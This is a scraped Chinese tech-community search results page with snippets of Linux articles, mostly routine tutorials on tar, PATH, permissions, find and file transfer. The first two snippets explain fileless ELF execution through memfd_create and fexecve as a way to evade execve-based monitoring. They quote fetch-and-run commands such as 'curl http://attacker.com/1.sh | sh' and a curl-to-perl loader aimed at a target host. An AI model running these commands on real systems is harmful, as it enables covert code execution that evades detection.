首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Linux文件渗透执行ELF

    exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh方法执行elf二进制文件呢?...02 技术核心 这里向大家介绍一个linux系统底层调用函数memfd_create(2),它在内核3.17中引入,会创建一个匿名文件并返回一个文件描述符指向它,该文件表现和常规文件类同, 可以进行修改...perl语言中提供了一个syscall()方法可以满足我们需求,当然python也可以,但是python实现该功能需要依赖第三方库。...第三部分就是执行文件了,调用exec函数执行该匿名文件 ? 这里我们最后EXP就生产好了,我们可以目标机上执行 curl 192.168.1.138/elfload.pl | perl ? ?...可以看到我们elf文件最终以匿名文件方式在内存中被加载执行了,从匿名文件运行程序与运行于普通文件程序之间唯一真正区别是/proc/pid/exe符号链接。

    5.5K80

    linux文件执行— fexecve 揭秘

    前言 良好习惯是人生产生复利有力助手。 继续2020年flag,至少每周更一篇文章,今天讲linux文件执行。...无文件执行 之前文章中,我们讲到了无文件执行方法以及混淆进程参数方法,今天我们继续讲解一种linux文件执行技巧,是后台朋友给我提醒,万分感谢,又学到了新东西。...linux文件执行,首先要提到两个函数:memfd_create 和 fexecve。...大家可以看到shmopen 其实是在/dev/shm创建文件,而execve执行文件为/proc/self/fd/3,为进程中打开文件符号链接,这个指向就是shm_open创建文件,但是从监控execve...角度来说, execve无法获取执行文件路径,从而实现了混淆。

    4.6K40

    Linux删除乱码文件方法

    文件名为乱码时候,无法通过键盘输入文件名,所以在终端下就不能直接利用rm,mv等命令管理文件了。 我们可以通过以下几种方法删除linux乱码文件。...(文件名为乱码) l 方法1 我们知道每个文件都有一个i节点号,我们可以考虑通过i节点号来管理文件。 首先,我们要取得文件i节点号。这个可以通过ls命令-i选项获得。...第二步,使用find命令将文件名传递给rm命令。 例: ? l 方法2 使用cp、mv和rm *组合间接实现删除所有的乱码文件。 首先,把其他非乱码命名文件拷贝到其他目录。...之后,删除该目录下所有文件。 最后,把拷贝文件移回原目录。 适用范围: 方法1:删除单个文件,或逐个删除乱码命名文件方法2:适用于乱码文件较多,又需要全部删除情况。

    8K80

    linux执行文件添加到PATH环境变量方法

    linux命令行下面执行某个命令时候,首先保证该命令是否存在,若存在,但输入命令时候若仍提示:command not found 这个时候就查看PATH环境变量设置了,当前命令是否存在于PATH...环境变量中 #查看PATH: echo $PATH 举例说,命令 composr 在/usr/loca/bin 但执行时候提示: -bash: composr: command not found 这个时候...#生效方法:立即生效 #有效期限:临时改变,只能在当前终端窗口中有效,当前窗口关闭后就会恢#复原有的path配置 #用户局限:仅对当前用户 方法二: #通过修改.bashrc文件: vim ~/.bashrc.../.bashrc”命令,立即生效 #有效期限:永久有效 #用户局限:仅对当前用户 方法三: #通过修改profile文件: vim /etc/profile export PATH=/usr/local.../bin:$PATH #生效方法:系统重启 #有效期限:永久有效 #用户局限:对所有用户 方法四: #通过修改environment文件: vim /etc/environment 在PATH="/usr

    3.2K60

    Linux文件打包(tar方法)

    Linux文件打包(tar方法) tar -c: 建立压缩档案 -x:解压 -t:查看内容 -r:向压缩归档文件末尾追加文件 -u:更新原压缩包中文件 这五个是独立命令,压缩解压都要用到其中一个...# tar -cf all.tar *.jpg 这条命令是将所有.jpg文件打成一个名为all.tar包。-c是表示产生新包,-f指定包文件名。...# tar -rf all.tar *.gif 这条命令是将所有.gif文件增加到all.tar包里面去。-r是表示增加文件意思。...生成一个umcompress压缩过包,命名为jpg.tar.Z rar a jpg.rar *.jpg //rar格式压缩,需要先下载rar for linux zip jpg.zip *.jpg...//zip格式压缩,需要先下载zip for linux 解压 tar -xvf file.tar //解压 tar包 tar -xzvf file.tar.gz //解压tar.gz tar -xjvf

    2.9K10

    Linux文件权限及修改方法

    Linux最优秀地方之一就是在于它多人多任务环境而为了让各个使用者具有较保密文件数据,因此文件权限管理就变很重要了。...Linux一般将文件可存取身份分为三个类别,分别是拥有者(owner)、所属群组(group)、其他人(others),且三种身份各有 读(read)、写(write)、执行(execute)等权限。...接下来我们来看看剩下字符代表含义: 前三个字符:rwx 代表文件拥有者权限,这里即可读、可写、可执行 中间三个字符:r-x 代表文件所属用户组权限,这里即可读、可执行,但不能写 后三个字符:r-x...,我们可以这么执行 如上图所示,在chmod执行之前,文件.bashrc权限为rw-r--r-- 在命令chmod执行后(黄色框框),文件.bashrc权限更改为rwxrwxrwx (2)符号类型修改文件权限...没错,两种以上两种方法都可以达到这个目的~ 好啦,这次就到这里了,下次我们会讲到Linux目录配置。临近学期期末,杂事比较多,可能要鸽那么几天,我们下次见!

    4.3K10

    Linux查找文件方法

    Linux四种查找文件方法 ? 一、which which命令作用是,在PATH变量指定路径中,搜索某个系统命令位置,并且返回第一个搜索结果。 也就是说它返回是你该命令所处位置。...下面是一些whereis命令参数: -b 定位可执行文件。 -m 定位帮助文件。 -s 定位源代码文件。 -u 搜索默认路径下除可执行文件、源代码文件、帮助文件以外其它文件。...-B 指定搜索可执行文件路径。 -M 指定搜索帮助文件路径。 -S 指定搜索源代码文件路径。 ?...-print: #find命令将匹配文件输出到标准输出。 -exec: #find命令对匹配文件执行该参数所给出shell命令。...-ok: #和-exec作用相同,只不过以一种更为安全模式来执行该参数所给出shell命令,在执行每一个命令之前,都会给出提示,让用户来确定是否执行

    6.5K10

    Linux系统文件传输方法

    1.文件在系统中传输 1.scp scp file user@ip:/dir #上传 scp user@ip:/file dir #下载 2.rsync 远程同步,速度快,默认会忽略文件属性...同步文件所有人 -g #同步文件所有组 -l #同步链接 -D #同步设备文件 -t #同步时间 注: westos/ #传送目录中内容 westos #传输目录及其内容 ?...-x #解压一个归档文件 –get #解档指定文件 –delete #删除归档中指定文件 -C #指定解档目录 ?...注:gzip,bz2,xz可以归档和压缩一起 总结 以上所述是小编给大家介绍Linux系统文件传输方法,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家。...在此也非常感谢大家对ZaLou.Cn网站支持!

    3.3K51

    linux中.sh文件是什么?怎么执行

    大家好,又见面了,我是你们朋友全栈君。 一、linux中.sh文件是什么? linux中.sh文件是脚本文件,一般都是bash脚本。 二、linux.sh文件怎么执行? 1、直接..../加上文件名.sh,如运行hello.sh为 ..../hello.sh 【绝对路径下也可以,但hello.sh必须有x权限】 使用绝对路径执行: 对于文件是否具有x权限,可以目录文件夹下(存放当前文件文件夹)输入 ll...命令查看,没有可使用 chmod u+x hello.sh 2、直接sh 加上文件名.sh,如运行hello.sh为 sh hello.sh【hello.sh可以没有x权限】 版权声明:本文内容由互联网用户自发贡献...如发现本站有涉嫌侵权/违法违规内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

    18.7K30
    领券